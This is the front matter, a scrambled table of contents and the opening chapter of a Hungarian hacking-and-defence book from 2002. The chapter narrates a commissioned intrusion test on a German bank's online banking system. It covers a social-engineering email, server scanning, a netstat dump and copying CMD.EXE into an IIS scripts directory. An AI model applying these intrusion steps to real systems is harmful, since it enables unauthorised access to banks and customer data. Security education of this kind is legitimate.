Thomas Vosseberg

Feltörés kontra védelem
Fontos figyelmeztetés!
A szerző a könyv teljes tényanyagát a legnagyobb gonddal dolgozta ki, illetve állította össze, és hatékony ellenőrzések mellett készítette. A hibák ennek ellenére sem zárhatók ki, ezért a kiadó és a szerző kénytelenek felhívni a figyelmet arra, hogy hibás közlésekre visszavezethető következményekért sem garanciát, sem jogi vagy bármilyen értelemben vett felelősséget vagy jótállást nem vállalnak. Az internetcímek vagy a verziószámok a szerkesztés lezártakor rendelkezésre álló állapotot tükrözik. A kiadó és a szerző semmilyen felelősséget vagy garanciát nem vállal a változásokért, amelyek tőlük függetlenül fellépő körülményekből adódnak. Az esetleg letöltésre kínált fájok és információk kizárólag nem üzleti felhasználásra szolgálnak. Üzleti felhasználás csak a licenctulajdonos beleegyezésével lehetséges. © 2002 Franzis1 Verlag GmbH, 85586 Poing © 2002 Computer Panoráma, 1091 Budapest, üllői út 25. Felelős kiadó: Dely Tamás ügyvezető igazgató Felelős szerkesztő: Horváth Annamária Fordította: Murányi Eszter Tervezőszerkesztő: Dancs Katalin Címlapterv: Szincsák László Minden jog fenntartva. Jelen könyvet, illetve annak részeit tilos reprodukálni, adatrendszerben tárolni, bármely formában vagy eszközzel - elektronikus, fényképészeti úton vagy más módon - a kiadó engedélye nélkül közölni. A kötetet készítette: Levilágítás: HVG Press Nyomtatás és kötés: Szegedi Kossuth Nyomda Kft. 6723 Szeged, Makkosházi krt. 1. Felelős vezető: Gera Imre ügyvezető igazgató
ISBN: 963 7639 225

Tartalom
1. A BANK-HACKELÉS 1.1 A feladat 1.1.1 Feltételek 1.1.2 A megoldáshoz vezető út 1.2 Hozzáférési út - információszerzés a Social Engineering módszerrel 1.3 A megfelelő cél keresése 1.3.1 Takarékpénztárak - túl sok szerverellenőrzés 1.3.2 Kutatás: IIS szerver kerestetik 1.3.3 Az operációs rendszer és a tranzakciós szoftver 1.3.4 Hogyan védik a szervert? 1.3.5 Nincsenek logfájlok - ezt biztosan az OFX irányítja 1.3.6 Adatátadás scriptekkel 1.3.7 Az adatletöltés 1.4 Utóirat a bank-hackeléshez 1.5 Összefoglalás 1.6 Sajtóbeszámolók 1.7 Tapasztalatok más bankoknál 1.7.1 Forgatókönyv a takarékpénztár-területen 2. A WINDOWS-RENDSZEREK (9X, NT, 2000) GYENGE PONTJAI 2.1 A hackeren túl - merevlemez-fejreállás, adatbetekintés vagy lopás 2.1.1 Különbségek a Windows 9x, az NT és utódai között 2.1.2 A fizikai támadás 2.1.3 Képernyővédő - jelszó - a bennfenteseknek nem okoz problémát 15 16 16 17 18 20 20 21 22 23 26 26 28 29 29 30 33 33 37 38 39 39 42

2.1.4 Automatikus lejátszás - a betörés előkészítése CD-vel
2.2 A jelszavak kikémlelése 2.2.1 Érdekes jelszavak szinte mindenütt akadnak

44
47 47

2.2.2 A jelszófájlok
2.2.3 Jelszavak a Windows 2000 alatt 2.3 A távoli elérésű támadás - internet- vagy hálózati felhasználók, vigyázat! 2.3.1 A fájl- és nyomtatómegosztás - veszélyes biztonsági rések 2.3.2 Mik azok a szkennerek, és hogyan működnek? 2.3.3 Milyen lehetőségeik vannak a betolakodóknak?

49
51 52 53 54 56

2.3.4 2.3.5

Jelszóval védett megosztások BruteForce-rohamok a megosztási jelszavak ellen

57 57
58 59

2.3.6 Óvintézkedések 2.4 További támadási technikák 3. ALAPOK

3.1 Az anonim Internetezés csökkenti a kockázatot 3.1.1 A legtöbb felhasználó sokat elárul 3.1.2 Névtelenül
3.2. A TCP/IP 3.2.1 Mi a TCP/IP?
3.2.2 Különböző protokollok a rétegekben 3.3 Néhány alkalmazás és protokoll használata és a biztonságosságuk 3.3.1 A Telnet

61 62 63 65
68 68
70 80 81

3.3.2 Az FTP 3.3.3. Az IRC
3.3.4 3.4 4. 4.1 4.2 4.2.1 Az IP-címzés Aportokról A TRÓJAIAK A történelmi minta Miből áll egy trójai? A szerver kiosztása

82 84
85 87 91 92 92 93

4.2.2 4.2.3 4.3 4.3.1 4.3.2 4.3.3 4.3.4 4.3.5 4.3.6 4.3.7 4.4 4.4.1 4.5 4.5.1 4.6 4.6.1 4.6.2 4.6.3 4.6.4

A kliens otthon marad, és vezérli a szervert Hogyan szerzik meg a hackerek az IP-t? így álcázzák és terjesztik a trójaiakat A trójaiakat fájlokba integrálják Álcázás a WinZip-pel. A trójaiakat az ICQ-val is tovább lehet adni Elég egy CD és az automatikus lejátszás funkció A lemezek majdnem ugyanígy működnek További terjesztési stratégiák Mit csinálnak a hobby-hackerek a trójaiakkal? Sub7 - egy trójai rémisztő lehetőségekkel Támad a Sub7 BackOrifice 2K - Hálózati eszköz vagy támadás a Microsoft ellen A BO2K és összetevői így ismerjük fel a trójait a rendszerünkben Vírus- és trójai-szkenner AutoRun bejegyzések Windows-Registry - ez már izgalmas Módszerek az Explorer.exe-vel a C:\ meghajtóra

94 95 96 96 97 98 99 100 100 101 102 103 105 106 107 107 108 109 112

4.6.5
5.

A runonce.exe kicserélése
VÍRUSOK - VESZÉLYES FÁJLOK

112
113
115 116 117 117 117 118 118 119 119 119 121 121 122 122 122 124 124 124 125 125

5.1 Alapok 5.1.1 Defektes cluster mint álcázás 5.1.2 Miről ismeri fel a vírusvizsgáló a vírust? 5.1.3 Videokártyák - az elvetemült támadók búvóhelyei? 5.2 A vírus felépítése 5.3 Hogyan fertőz meg a vírus egy fájlt? 5.3.1 így fertőznek a bootszektor vírusok 5.3.2 A dropper vírust helyez el 5.4 A legfontosabb vírustípusok rövid áttekintése 5.4.1 Bootszektor vírusok 5.4.2 Companion vírusok 5.4.3 Killerprogramok 5.4.4 Logikai bombák 5.4.5 Makrovírusok 5.4.6 Hálózati vírusok 5.4.7 Polimorf vírusok 5.4.8 Stealth vagy rejtőzködő vírusok 5.4.9 A TSR fájlvírusok 5.4.10 Update vírusok 5.4.11 Férgek - az ILOVEYOU és társai

5.4.12 Időzítők
5.5 Word makrovírus írása 5.5.1 Minden ténykedés központja - a Normal.dot fájl 5.5.2 Modul vagy osztálymodul? 5.5.3 Vírusok kontra ServiceRelease 5.5.4 Modul makrók 5.5.5 Ilyet is lehet: a vírus egy Payload-ot hív meg 5.5.6 A vírus fájltulajdonságokat vagy szövegtartalmakat változtat meg 5.5.7 A vírus jelszóval védi a fájlt 5.6 Megfertőzött osztálymodulok

126
126 126 127 127 127 131 132 133 133

5.7

ILOVEYOU

137
138 138 140 140 149 149 150

5.7.1 Mi az a féreg? 5.7.2 A működési mód 5.7.3 Hogyan tudott a féreg elterjedni? 5.7.4 A forrás - kommentárokkal 5.8 Hogyan működnek a vírusvizsgálók? 5.8.1 Szkennermodul 5.8.2 Víruspajzs

1 7.4 6.2 7.1 E-mail-támadások 8.8 6.2.3.1 Szkennelés teljes TCP-kapcsolattal 6.5 TCP-Syn-Flooding 10.6 A jelszófájl 8.biztonsági kockázat? 8.5 6.1.1 Hogyan lehet ezt kihasználni? 165 167 168 168 170 172 174 175 176 181 182 182 184 184 187 188 189 190 190 191 192 192 192 193 195 196 197 197 197 197 198 .2 A fájlmelléklet kitömése 8.praktikus és veszélyes 8.2. A DENIAL OF SERVICE TÁMADÁS 10.3 A ConCon bug 8.2.A RÉSEK KERESÉSE 151 152 153 153 153 6.4. A szkenner 6.8 DDoS .4.3.2. TÁMADÁSOK AZ INTERNET-FELHASZNÁLÓK ELLEN 8.2 ICQ .4 7.2.7 Smurf 10.2.2 Milyen biztonsági rések vannak? 9.2.4 Mit lehet tenni a snifferek ellen? 10.6 Ping-Flodding 10.1.2 7.a „nuken" 10.2.6 6.4 7.4.4.4.2.2 Out-of-Band csomagok .9 Védelem a DoS-támadások ellen 11.Distributed Denial of Service támadások 10.3 7.1 Szöveg 11.3 Astack (magyarul: halom/rakás) 11.3 7.8.1.jelszófeltöréssel ez is lehetséges Mire kell ügyelni a felhasználói oldalról? A jelszófeltörők Ismert felhasználói nevek jelszavainak a kitalálása A beállítások egy áttekintésben Jelszavak megfejtése a John the Ripperrel Single Mode A szólista módszer Incremental mód Extemal mód A John legfontosabb parancsai 157 158 160 161 162 162 163 163 164 164 165 165 7.2 Hogyan működik egy sniffer? 9.1 Az ICQ .4.1.7 6.8.1.1 7. BUFFER-OVERFLOW 11.2 A Buffer-Overflow-támadások 11.2. SNIFFER 9.2 Szkennelési eljárások 6.1. 7.túlcsordul a postafiók 8.1 Mailbombák .1 Mi az a sniffer? 9.3 5.3 A sniffer veszélyei 9. SZKENNELÉS .4 Land támadások 10.5 JELSZÓFELTÖRÉS Hackelt security-site .1.2 Félig nyitott TCP-szkennelés 6.1 7.1 Az operációs rendszer memóriakezelése 11.2 7.5.3 TCP-FIN-Scan 6.4 „Fertőtlenítő" A vírusvédő program kiválasztásának a szempontjai 150 150 6.2.1 Az IP-spoofing mint előfeltétel 10.2 Adatok 11.2.9 Fragmentált szkennelés UDP-lCMP-Port-Unreachable szkennelés UDP-Recvfrom-And-Write szkennelés ICMP-echo-scanning/ping-szkennelés A nyitott portok csak a kezdetet jelentik A portszkennelés elleni védelem 154 154 154 155 155 155 152 7.3 Large Packet-támadások avagy a Ping of Death 10.

1 A CGI további ismert gyenge pontjai 12.1 Védelem 12.1 Összefüggés a CPU és a Buffer-Overflow között 11.5.4 Honnan lehet felismerni a Buffer-Overflow-t? 11.5 Milyen védelmi mechanizmusok vannak? 11.3 BBS biztonság 12.1 Egy desktop tűzfal megtámadása 13.1.2.5.4.count. BIZTONSÁG A WEBEN 213 214 217 221 221 222 224 12.5 Defacement .2.1.1.1.cgi 12.2 Látogatásszámláló résekkel .11.a „script kidek" nemzeti sportja 12.2 A tűzfalak kategóriái 13.6 Hogyan védhetjük meg a webszervert? 225 226 227 229 13.2.2 A Buffer-Overflow-k és a tűzfalak 199 202 208 209 211 212 212 12.4 Jelszóval védett webterületek megtámadása 12.3 Tűzfal-koncepciók 13.3 Áldozat a Buffer-Overflow-kért 11.4 Hogyan ismeri fel a támadó a tűzfalat? 13.4.2 Hitelkártya fake-ek 12.1.2 Védelem 12. TŰZFALAK 13.1 A tűzfal feladatai 13.1 A tűzfal biztonsági szempontból fontos összetevői 13.1.2.1 CGI-scriptek biztonságossága 12.2 Hogyan működik? 11.3 Minek kell a Shellcode változónál állnia? 11.2 Védelem a desktop tűzfallal 231 232 233 234 235 236 237 239 240 .2 Desktop tűzfalak 13.

...... Az érintett intézmény a „betörés" hatására ugyan változtatott online banking rendszerén.......... Be kellett törni a rendszerbe..1....................6 Adatátadás scriptekkel.. amelyről ebben a fejezetben írunk...7.. 1.30 Tapasztalatok más bankoknál....3..... A biztonság kérdését kétféleképpen lehetett megközelíteni: « Mennyire védettek az ügyfelek adatai.....1..... Meg kellett találni a hozzáférési utat az adatokhoz vagy a szerverhez.... csak a bank jött ki rosszul az ügyből.... a bank nevét a szerzők .jogi megfontolásokból .......... 26 1.1.ezt biztosan az OFX irányítja ...21 1...? 1.......29 Sajtóbeszámolók. • A bank online rendszerét nem lehetett sem zavarni....... fejezet .1 Feltételek A feladat természetesen bizonyos feltételekhez volt kötve........ • Trójai elhelyezése a homebanking-ügyfeleknél........ Két lehetséges indítás jutott a csoport eszébe: • Az intézmény webszerverének a megtámadása... 26 1...... Ezek közé tartoztak: « Egyeden ügyfelet sem érhet kár. Ez azt jelentette.............. mennyire biztonságos manapság az online banki ügyintézés Németországban..... ... és ezt követően a banki szerver megtámadása a .........letakarták..........5 Nincsenek logfájlok .Tartalom A feladat... és fel kellett deríteni a manipulációs lehetőségeket......1 A feladat 2001 júniusában érdekes feladatot kapott egy fiatal hacker-csoport: banki rendszereket és elektronikus kártyákat kellett tesztelniük.. s az ARD Technikai Tanácsadó műsor keretében kellett ellenőrizni.23 1..1 Forgatókönyv a takarékpénztár-területen............. 4.............. sem korlátozni a működésében.......3.20 1......33 1.. nehogy az érintett bank az adás sugárzása előtt ideiglenes intézkedéseket tegyen...........................2 A megoldáshoz vezető út A dolog a következőképpen zajlott: 1............16 1. manipulálni.. 3....2 Kutatás: IIS szerver kerestetik ...4 Hogyan védik a szervert?.. Ki kellett kémlelni az adatokat..1 Takarékpénztárak-túl sok szerverellenőrzés........................ A támadás visszhangja a könyv szerzőjére nézve mindenképpen pozitív volt....3...............1.......3...1...3 Az operációs rendszer és a tranzakciós szoftver 22 1...........................3....... hogy az végrehajthatatlanná váljon.......információszerzés a Social Engineering módszerrel___18 A megfelelő cél keresése......16 1...... így a támadás ennek a könyvnek a megjelenésekor már nem ismételhető meg.. adatokat lekérdezni.... vannak-e lehetőségek betörni egy banki szerverbe? • Mennyire biztonságosak a tranzakciók...............2 A megoldáshoz vezető út.... • Mindennek észrevétlenül kellett történnie...... ám mivel a potenciálisan fenyegető károk még most is jelentősek lehetnek....20 1.... hogy egyetlen tranzakciót sem lehetett úgy manipulálni vagy hamisítani.........33 1 A bank-hackelés Rövid ideig az érdeklődés középpontjába került egy különös támadás egy németországi bankszerver ellen... Manipulálni kellett a tranzakciókat. átirányítani stb................. 28 Utóirat a bank-hackeléshez 29 Összefoglalás.. 1.3. hogy megakadályozza a hiányosság nyilvánosságra kerülését.....3.17 Hozzáférési út ............1 Feltételek........ ....... amelyeket a homebanking során végrehajtanak? Van-e lehetőség.. 2..7 Az adatletöltés........

Több banknak e-mailt írtak. és az internetről jövő kapcsolattól fizikailag elválasztott kapcsolatot állít elő a webszerverhez úgy. lecsapni. és most tudni akarja a saját bankjáról. Ezt a mailt elküldték 10 nagy német pénzintézetnek. a pénze sehol sincs nagyobb biztonságban. amikor az ügyfél online intézi banki ügyeit. hiszen talán csak kisebb hiányosságokra bukkannak. aki hallott egy másik bank webszerverét ért hackertámadásról. Először tehát információkat kellett gyűjteniük. hogy semmilyen visszacsatolás nem lehetséges kívülről a külső rendszerre. hiszen többnyire maga sem tud róla semmit. nem utolsósorban a (német) Btk. az alábbi mail érkezett. enged át kéréseket. át kell játszani nekik egy trójai vírust. és végezetül szenvtelenül megkérdezték. Körülbelül 5 nap és 9 „Aggodalomra semmi ok. amely csak a 443-as portot (HTTPS-kódolású adatátvitel SSL-lel) bocsátja rendelkezésre. és csak az exkluzíván az online banki rendszer elé kapcsolt pluggateway-en. amelyeket nyugodtan fel lehet mutatni. A plug-gateway. Továbbá az . Az ÖN XY bankja. Az egyszerűbb természetesen a régi jó trójaihoz való visszanyúlás lett volna: néhány PC-t kikémlelni.2 Hozzáférési út . hogy aligha lehetne végrehajtani a tulajdonképpeni tesztet. Végülis arra a döntésre jutottak. Először tájékozódni kellett a banki struktúráról.kikémlelt ügyféladatokkal. installálni kell a trójait stb. Éppen ezért hálózattech-nikailag jártasnak mutatták magunkat. A plug-gateway tűzfala minden csomagot analizál. mint nálunk. amely naplózza. Azonban a saját ügyféltanácsadót kérdezgetni bankja szerverének részleteiről nem túl szerencsés. Természetesen egyik résztvevőnek sem volt pontos koncepciója. hogy valójában mennyire van biztonságban ennek az intézménynek a pénze. Néhány terepkísérlet után azonban ez a lehetőség a hajánál előrángatottnak tűnt. jelzi és vissza is veri a rendszer elleni támadásokat. Így az ügyfelek banki adatainak az átvitele az online banking oldal betöltésétől kezdve biztonságos és kódolt. és csak a szűrőszabályok (csak HTTPS elérések engedélyezettek) teljesülése esetén továbbítja az online banki rendszer webszerverére. Ráadásul egy ilyen indítást állandóan felügyelni is kell. a szerzőket is meglepve. amely a Cisco router és a bank szervere között található. illetve védett-e az online banki szolgáltatása. Intrusion Detection System is található. vagy pedig gyanút fog. A Cisco router mögött még egy exkluzíván az XY bank számára installált. hogy a felépítése miatt ne tudjanak egy szabvány ügyfélszolgálati szöveggel válaszolni rá. hogy egyszer azért megpróbálkoznak vele. Ügyfeleket kell találni. és azt sem tudták. 1. majd a megfelelő pillanatban. annak olyan sajtóviszhangja lenne. és 263. hiszen a kikémlelés után várni kell az első homebanking tranzakcióra. A megfelelő lehetőséget tehát csak egy pénzintézet webszerverének a feltörése jelenthette. 202. amelyek online portált működtetnek. hogyan is védi a bank az online ügymenetet és az ügyfelek adatait. a következő feladatokat látja el: Az internetkapcsolat és a webszerverhez kapcsolódás fizikai szétválasztása: egy külső rendszertől induló kapcsolat felépítésénél átveszi a kapcsolatot. Más megoldást kellett tehát találni. integrált tűzfallal. 1." típusú szabványmail után. Az infrastruktúra Az XY bank online banki rendszerének infrastruktúrája a következők szerint van kiépítve: Valamennyi online banking megkeresés egy Cisco routeren keresztül érkezik. Ez természetesen heves vitákat váltott ki. amelyben ügyfélnek adták ki magunkat. S ha egy ilyen akció kitudódna. A mailt úgy kellett megírni.információszerzés a Social Engineering módszerrel Mindenekelőtt személyes kapcsolatokon keresztül próbáltak információkat szerezni a bankszerverről. §-aira való tekintettel. hogyan is néznek ki pontosan a banki rendszerek.

melyik bank legyen az? 1. később) eredményeként már világos volt: minden bank különböző pénzügyi szoftvereket használ.túl sok szerverellenőrzés A német takarékpénztárak az infrastruktúrára vetett rövid pillantás után kiestek.). és semmilyen visszacsatolást nem engednek meg a valójában felhasznált PIN-re. Takarékpénztárak . ahol az ügyfelek a számlájukhoz férnek. Miután ezekről a szerver-kliens szoftverekről csak szűkös információkat találtak.cgi/Ostseespk_Rostock. mert például Hannoverben majdnem minden takarékpénztárat ÉszakNémetországból hostolnak.adatbázis szerver fizikailag el van választva a webszervertől és az alkalmazástól.2 Kutatás: US-szerver kerestetik így tehát inkább a nagyobb bankokra kellett összpontosítani. ám az onlinebanking egy számítógépközponton keresztül zajlik. hogy minden bevitel egy log-fájlba vándoroljon. A kérdés csak az volt. és már egy tesztcélú szkennelés is figyelmet keltene. hogy keresnek egy nagyobb bankot.3. hogy további információkat tudjunk meg a rendszerről (hardver. hogy az adminek „a gépen ülnek". hogy csak egy bank login oldaláról juthatnak hozzá az ügyfelek adataihoz. arra a módszerre amelynek révén részletes bepillantást nyerhettek a banki webszerver biztonsági intézkedéseibe. hóban maga hajtott végre szkennelést a nyitott internetfellépés és a bank online rendszere ellen. 2. A kísérlet. Mivel a keresett formátumból tulajdonképpen nem sok volt. nem sikerült. azonban néhány szkennelés (közelebbit ld.ostspa. Hannoverben található. és kezelik a további ügyfélinformációkat. így az adatbázist egyáltalán nem lehet közvetlenül elérni az internetről.finommunkák Ami a mail-bői nem derült ki. Az volt ugyanis a probléma velük. 1. port) a 128 bites kódolású. hogy lássák a szervereiket. amelynek a szervere közvetlenül csatlakozik az online banking-hez.3 A megfelelő cél keresése Az ötlet tehát az volt.de/cgi/anfang.3. a következő cím alatt fut: https://ww2.06.1. biztonságos internet-eléréssel érhető el. hogy nincsenek-e esetleg kódolva ezek stb. az online banki rendszer csak HTTPS-en keresztül (443. szerver stb. továbbra is tisztázatlan. Egy támadás itt egy kicsit melegnek tűnt. A részletes információk szkennelése . Ezek gondoskodnak a számlaszámok és a PIN-ek belépő ellenőrzéséről. hogy minden egyes bankot megvizsgáltak. Szkenneltek néhány bankot. miközben ez a szerver a DVG-nél. 1. Ez egy jól sikerült példa volt a Social Engineeringre. Az adminisztrátor 2001.de. például az OFX-et (Open Financial Exchange). havi biztonsági analízise A rendszeradminisztrátor 2001. és ki lehetett indulni abból. Ez a szabvány az internetes tranzakcióknál biztonságos. A PIN-ek kódolva vannak tárolva az adatbázisban.hotnebanking-mecklenburgvorp. és ott úgy változtatják meg a login-oldalakat. Még ha lehetséges is lenne adatokhoz jutni az OFX-adatbázisból. világossá vált a számukra. Biztonság Az infrastruktúra (hardver és rendszerszoftver szinten) megfelelő védettsége érdekében még a következő biztonsági intézkedéseket tettük az online banki ügyintézésnél: A kliens és a szerver közötti kapcsolat 128 bites maximális kódolással épül fel. Itt van példának a www. Mint várható. hogy ugyan majdnem minden takarékszövetkezetnek van saját weboldala. A hackeléshez tulajdonképpen csak egy Microsoft HS-szerver jöhetett szóba. azzal kezdhettek. Részletek a szerverekről . 06. Ennek az oldalnak a szervere Schwerinben van. de a tulajdonképpeni oldal. operációs rendszer. 3.

egy portált.3. Tivoli Management Software-rel karbantartva (amelynek a hibáiról lehetett már hallani)! De ezt ezen a szerveren nem ellenőrizték. Ellenőrizni a védelmi mechanizmusokat. így az oldal elérési számainak is magasnak kellett lenniük. és a még futó régi rendszert „elhanyagolják". Hitelesíteni. mert e bank ügyfeleinek egész Németországban erről a portálról kellett bejelentkezniük. A program szállította a legfontosabb információkat az egyes bankok és takarékpénztárak webszer-vereiről.3 Az operációs rendszer és a tranzakciós szoftver Egy NT-webszerver IIS 4. lehetséges. mint magáé a rendszeré. Feltérképezni az operációs rendszert és a tranzakciókhoz használt szoftvert. amely e bank mellett szólt.4 Hogyan védik a szervert? Úgy tűnt. mert egy végzetes rés a IIS-en. 4. 5. a szerver tervezett átépítése volt. és kapcsolatokat sem engedett meg . úgy az oldalé. hogy sikerrel járnak. A támadáshoz a következő lépéseket kellett végrehajtani: 1. 1.Itt láthatók az infók a felhasznált szerverekről A szkennelő program segítségével különböző bankportálokat vizsgáltak. így a webszerver megtámadásának az időpontja több mint ideális. 1.) Napokig tartó szkennelés után találták meg a ••• oldalt. amely a parancsok dekódolását érintette.3. Egy további érv. hogy vannak-e logfájlok információkkal. fejezetben részletesen is olvashatnak. 2. (A szkennelés témájáról a 6. amelyen keresztül úgy a bank. Ellenőrizni. Utólagos becslések szerint az említett szám 5000 és 9000 között mozgott óránként. Kikutatni az adatátvitelt. 6. A bank minden szakembere az új projekten dolgozik. Tehát abból indulhattak ki. a ••• ügyfelei be tudtak login-olni. 3. tökéletesen elegendő volt. A cél ismertetőjegyei . mert nem válaszolt a pingekre.0-val. a szervert tűzfal védi. mint egy leányvállalat. Tesztelni az exploitokát.az előkészítés feltételei A cél optimálisnak tűnt. hogy megtalálják a betörésre alkalmas rendszert.

0.0:0 62.27.0.0.153.0. Mivel a távoli számítógépet egy komputernévvel jelölték.0:0 0. Íme a netstat-jelentés: Prot.0:3125 0.0.236:57480 193.0.209.0:0 0.130.197.158.0:0 0.0:0 0.0.xx:3127 193.xx:80 193.0.0:0 0.0.24.191:1042 212.0:0 0.4:80 172.24.1:1025 127.0.130.130.27. A szkennelések során nem derült ki pontosan.152.0. 133.209.24.0.209.0.0.xx: 139 1 72.0.0.0.0:3038 0.158.0:0 0.xx:138 1 72.1:1025 0.xx:443 Távoli címek 62.0.213:1233 62.24.0.xx:80 193.xx:80 193.0.153.0.27.0.158.213:1236 62. 209.0:0 0.0:0 127.24.158.xx:443 Távoli címek 0.0.0:1031 0.0.0.209.0.0:0 0.158.0:4796 0.0.211:4232 62.0:1027 0.0:2874 0.0:1037 0.1:1028 127. port) kívül más portok elérése is megengedett-e.145.133:4233 0.0.0.27.158.0.0.24.xx:443 193.xx:80 193.158.130.213:1235 62.209.0.0.0.209.xx:443 193.0:0 172.0.213:1234 62. de ezt kizárni sem lehetett.0:135 0.209.3:1036 62.0.24.xx:31 11 172.0.24.158.130.xx:80 193.0.0.0.xx:443 193.0:0 0.209.0.61:1119 212.0.197.kifelé.0.0. Helyi címek TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP 0. hogy a webszolgáltatón (80.0.0.158.0.xx:443 193.24.0.27.0:0 0.xx:139 193.0.0.0:0 0.0.0.27.158.0.209.209.152.0:0 0.0.158.0:0 0.xx:80 193.197.0.xx:80 193.211:4233 62.0.0:0 0.158.0.209.0.0.130.xx: 137 172.0:135 0.4:1557 212.209. 152.0.209.209.46.158.166.1 52.0:0 127.206.0.0:0 0.xx: 1029 172.0:0 0.0:0 0.0.0.158.157.0.1:1031 1 72.0:3168 0.xx:138 193.0:3489 0. xx:3125 172.0.209.1:1025 127.0:161 0.0.4.24.209.0.0:0 0.0.0.24.0.1:1026 127.0. intranet kapcsolatból indulhattak ki.0.209.209.xx:137 193.0.0.144:1073 217.0.xx:80 193.0. xx:443 193.0:0 Állapot LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING ESTABLISHED LISTENING LISTENING ESTABLISHED LISTENING LISTENING LISTENING LISTENING ESTABLISHED TIME_WAIT ESTABLISHED TIME_WAIT TIME_WAIT LISTENING TIME_WAIT TIME_WAIT ESTABLISHED ESTABLISHED ESTABLISHED ESTABLISHED ESTABLISHED ESTABLISHED ESTABLISHED LISTENING LISTENING LISTENING LISTENING CLOSING TIME_WAIT TIME_WAIT TIME_WAIT TIME_WAIT TIME_WAIT TIME_WAIT TC P TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP 0.0.xx6.0.27.213:1237 62.0.0.0.27. 209. 152. 158.xx:443 193. xx:3038 1 72.0.5:1435 172.0.153.0. port) és a HTTPS-en (443.0:0 0.0.24. TCP Helyi címek 193.0.0.0:2867 0.24.130.0.xx:443 193. 152.0:0 0.0:3128 0.153.0:0 0.0.0.xx6.0.0:4487 0.0.5:1435 172.0.130.1 58.0.0.0:512 0. és azt sem lehetett megmondani.xx:3126 172.213:1182 62.0:0 0.166.4:80 172.0:0 0.0.0:0 0.0.5:1435 0.0.0.0:2882 0.2. milyen tűzfalról volt szó.0.0.0.0.101.213:1238 Prot.158.0. 152.0.24.158.158.0:3037 0.0.0:0 0.0. mert a netstat-jelentés 4:00 óra körül kapcsolatokat mutatott a 4966/4967 portra.xx:80 193.0.0.0.0:5044 127.0:3697 0.xx:80 193.0.0.0.0. 152.0:0 62.0.27.1 58.153.1:1031 0.0.0.0.213:1240 Állapot TIME_WAIT .0.158.0.209.158.209.46.0.0:0 0.158.0. 152.0:3111 0.

xx:1030 62. milyen módon lehetne megtámadni a szervert.xx:443 193.130.19.209.xx:443 193.130.152. 152. Ebből továbbra is arra következtettek.158.xx:443 193.153.209.11.27. amely aztán visszaadja a hibakódokat.130.27.209.158.158.158. Feltételezték.1 58. sem a C:\WINNT\ system32\LogFiles könyvtárban.209.27.xx6.xx:443 193.27.158.213:1242 62.3:1037 62.xx:443 193.209. 209.209. sem máshol.209.209.xx:1184 62.158.209.24.165. és ezt éri el.1 58. Előkészületek (hozzáférés megszerzése) A megfelelő URL megadásával elérték a hozzáférést.213:1244 62.213:1246 62.xx6.amelyek szokatlan módon nem VB scripteket.xx:443 193.3:1040 62. 152.xx6. a PIN és a felhasználó által megadott TAN az OFX-hez továbbítódik.xx:443 193.0:161 172.xx: 1030 193.27.0.209. Találtak viszont OFX-szoftver-jelentéseket.xx6.27.152.vezérlik.130.130.158.xx:138 1 72.xx:443 193. hogy ezeket központilag tárolják egy számítógépen.0.1 58.158. hogyan is fogadja és továbbítja a rendszer az adatokat bejelentkezéskor.0.3:1039 62.xx:3128 209.56.209. a felhasználói adatokat egy adatbázisba küldik. 209.1 58.0.xx:137 193.27.xx:443 193.19.xx:1186 62.209.xx:1182 62.xx:443 193.209.xx:443 193.158.24.158.xx:3128 0.213:1243 62. xx:1277 193.158.xx6.209.158.0.24. xx:443 193.xx:2326 63. Természetesen pontosan megnézték.EXE-t a webszerver rendszerkönyvtárából a script-könyvtárba másolták.24. Az OFX-et az ASP-oldalakról .xx:443 193. 209.0.xx:1185 62.209. és az adatokat nem lokálisan ellenőrzik.158. amelyek azonban nem adtak információt a kapcsolatokról. 209. 154. és ott hasonlítják össze.0:0 193.xx:443 193.19.xx: 1202 0.xx:443 193.xx:3121 193. 1.27.1 58.xx:443 193.xx:137 172. sem adatbázis-jelszavakat vagy hasonlókat nem találtak.27. hanem JAVA scripteket használnak .209.3:1044 62.xx:443 193.27.xx: 11 94 62.27.1 58.209.xx:443 193.158.3:1041 62.19.27.3:1042 62.209.xx:443 193.6 Adatátadás scriptekkel A szkennelés után világos lett.xx6.130.xx6.213:1241 62.xx: 1029 193. Tehát a tranzakcióknál a tranzakciók számai.56.3.54.158.213:1245 62.5 Nincsenek logfájlok ezt biztosan az OFX irányítja IIS logfájlokat egyáltalán nem találtak.209.158. 209.209.209.xx6.153.158.0:135 0.213:1247 62.209.158.xx:443 193.130.xx:443 1 93. illetve kezeli az OFX szoftver.TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP UDP UDP DP UDP UDP UDP UDP UDP 193.xx:443 193.xx:443 193.3:1038 62.158.158.158.209. vagy teljesen lemondanak a loggolásról! Az OFX-ről A szerveren sem folyószámla-adatokat.27.27.153.24.153.158.xx:443 *:* *:* *:* *:* *:* *:* *:* TIME_WAIT TIME_WAIT TIME_WAIT TIME_WAIT TIME_WAIT TIME_WAIT TIME_WAIT TIME_WAIT TIME_WAIT TIME_WAIT TIME_WAIT TIME_WAIT TIME_WAIT TIME_WAIT ESTABLISHED CLOSING TIME_WAIT TIME_WAIT TIME_WAIT TIME_WAIT TIME_WAIT CLOSING TIME_WAIT ESTABLISHED CLOSING LISTENING ESTABLISHED *:* 1.158.209.3. hogy működőképesen legyen kezelhető a .209. A parancsfordító CMD. hogy vagy a tűzfal log-okat értékelik ki.59.152.27.158.3:1043 62.xx6.209.xx:443 193.158.xx:138 193. xx:443 193.

